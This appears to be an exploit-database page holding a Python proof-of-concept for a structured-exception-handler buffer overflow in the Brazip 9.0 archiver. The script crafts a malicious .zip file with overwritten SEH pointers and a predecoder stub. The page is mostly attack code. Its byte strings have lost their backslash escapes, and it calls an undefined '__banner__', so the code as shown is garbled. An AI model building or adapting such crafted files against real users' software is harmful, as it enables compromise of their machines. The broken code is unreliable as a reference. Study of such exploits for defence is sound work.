Brazip 9.0 (.zip File) Buffer Overflow (SEH)

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Brazip 9.0 (.zip File) Buffer Overflow (SEH)
# Published : 2010-08-17
# Author : ItSecTeam
# Previous Title : Acrobat Acrobat Font Parsing Integer Overflow Vulnerability
# Next Title : RockN Wav Editor 1.8 Denial of Service Vulnerability

#!user/bin/python
######################################################################
# Brazip 9.0 (.zip File) BoF Poc (SEH) 
# Homepage  : www.brazip.com.br
# Version   : 9.0
# Tested Os : Windows XP SP1/SP3 EN 
# Usage     : $ Python Brazip-poc.py
######################################################################
#AUTHOR: ITSecTeam
#Email: Bug@ITSecTeam.com
#Website: http://www.itsecteam.com
#Forum : http://forum.ITSecTeam.com
#Advisory: www.ITSecTeam.com/en/vulnerabilities/vulnerability60.htm
#Thanks: Hoshang jafari  aka [PLATEN]
######################################################################
import sys
print __banner__

header_1 =("x50x4Bx03x04x14x00x00"
"x00x00x00xB7xACxCEx34x00x00x00" 
"x00x00x00x00x00x00x00x00" 
"xe4x0f" 
"x00x00x00")
 
header_2 = ("x50x4Bx01x02x14x00x14"
"x00x00x00x00x00xB7xACxCEx34x00x00x00" 
"x00x00x00x00x00x00x00x00x00"
"xe4x0f"
"x00x00x00x00x00x00x01x00"
"x24x00x00x00x00x00x00x00")
 
header_3 = ("x50x4Bx05x06x00x00x00"
"x00x01x00x01x00"
"x12x10x00x00"
"x02x10x00x00"
"x00x00")
nseh="x41x41x41x41"  
seh="x65x47x7ex6d"   

payload = "A" * 297 + nseh  + seh

predecoder = "x59x59x59x51x5c"
payload=payload+predecoder
filltoebx="B" * (100-len(predecoder))
rest = "C" *  (4064-len(payload+filltoebx)) + ".txt"
payload = payload+filltoebx+rest
exploit = header_1 + payload + header_2 + payload + header_3
 
try:
	f=open("Brazip-poc.zip",'w')
	f.write(exploit)
	f.close()
	print   "[+] File created successfully !" 
	sys.exit(0)
except:
	print "[-] Error cant write file to systemn"